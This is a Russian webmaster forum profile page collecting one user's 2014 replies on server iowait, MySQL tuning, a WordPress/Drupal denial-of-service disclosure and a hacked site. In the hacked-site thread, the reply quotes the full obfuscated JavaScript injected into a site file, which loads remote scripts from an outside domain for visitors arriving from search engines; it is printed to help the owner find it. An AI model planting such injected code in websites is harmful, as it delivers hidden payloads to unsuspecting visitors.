Комментарии - tls - Профиль вебмастера - Форум об интернет-маркетинге

7 августа 2014, 17:55

WordPress and Drupal Denial Of Service Vulnerability

Высокий iowait

6 августа 2014, 20:18

netwind:
на последних картинках видно, что SSD добавили только для mysql.

askary:
Оставили 16гиг

Еще надо не забывать, что /tmp, tmpdir от MySQL и папка кэша Nginx'а остались на Sata (а с учетом добавки памяти можно попробовать для них tmpfs).

2All: "WordPress and Drupal Denial Of Service Vulnerability Full Disclosure": http://www.breaksec.com/?p=6362

Задавайте вопросы про Drupal - 2

6 августа 2014, 20:05

WordPress and Drupal Denial Of Service Vulnerability Full Disclosure: http://www.breaksec.com/?p=6362

Version affected
WordPress 3.5 – 3.9 (latest version), works on default installation
Drupal 6.x – 7.x (latest version), works on default installation

...

Mitigation:
Update WordPress, Drupal (http://wordpress.org/download/, https://www.drupal.org/download)., or Delete xmlrpc.php.

Взломали сайт. Появляется реклама.

3 августа 2014, 15:34

tls:
Woland1982, Проверяйте: /engine/classes/js/dle_js.js

Еще: /forum/clientscript/yui/connection/connection-min.js

И конечно надо искать через что залили.

Взломали сайт. Появляется реклама.

2 августа 2014, 20:40

Woland1982, Проверяйте:

/engine/classes/js/dle_js.js:

var regV = '/ya\.|yandex\.|google\.|mail\.|rambler\.|vk./';
var ref = document.referrer;
var result = ref.match(regV);
if (result) {
function P3wRn9(n){ var suzRqS = 'abcdefghijklmnopqrstuvwxyz'; var iVec = suzRqS.charAt(Math.floor(Math.random() * suzRqS.length)); while(iVec.length < n) iVec += Math.random().toString(36).slice(2, 12); return iVec.substr(0, n);}
var HkF71iU = P3wRn9(6);
var z5H7SJu6UFcR = document.createElement('script');z5H7SJu6UFcR.src = 'http://www.rt-ns.ru/'+HkF71iU+'.php?id=11303&mb_s=1&f=m';z5H7SJu6UFcR.type = "text/javascript";document.getElementsByTagName('head')[0].appendChild( z5H7SJu6UFcR );function IppRK2DLfW81(){if(window.beSu===undefined){setTimeout(IppRK2DLfW81,1e3);return}for(i=0;i<xzArr.length;i++){var a=document.createElement("script");a.src="http://www."+qwDo+"/"+plFo+"/"+xzArr+".php?id="+kfId+"&mb_s="+nlMs;a.type="text/javascript";document.getElementsByTagName("head")[0].appendChild(a)}}IppRK2DLfW81()
}

Оптимизация БД - как ускорить?

30 июля 2014, 18:15

Metal_Messiah, вообще, дебажить большую базу на непустом VPS - это неправильно. Я бы рекомендовал перенести сайт на время на отдельный VPS (например, DigitalOcean, OVH) и начать с MySQLTuner'а и статистики в phpMyAdmin. А судя по большим тормозам при выборке по индексу, текущий VPS может просто не тянуть новую нагрузку.

Высокий iowait

27 июля 2014, 21:18

askary, Ok, еще посмотрите mytop. И зачем вам php-cgi?

нужна помощь в установке скрипта

27 июля 2014, 20:55

anonimvasil:
вот содержимое файла fullstiry.tpl , двигло dle10

Судя по документации, контейнер галереи вставлен криво.

Высокий iowait

27 июля 2014, 15:17

askary:
хотя настройки мускула(увеличение кэшей) особо на wa не влияют

А что говорит MySQLTuner? Другие утилиты тоже посмотрите. И мне кажется, что для такой посещалки слишком высокая загрузка CPU.

nmap видит сайт, браузер нет

23 июля 2014, 16:53

LEOnidUKG:
Провайдер просто уверяет, что нет вообще никаких блокировок.

Может блокирует магистральный провайдер? В рф такое делал ростелеком.

В 2023 году 36,9% всех DDoS-атак пришлось на сферу финансов

Что делать, если ваша email-рассылка попала в спам

tls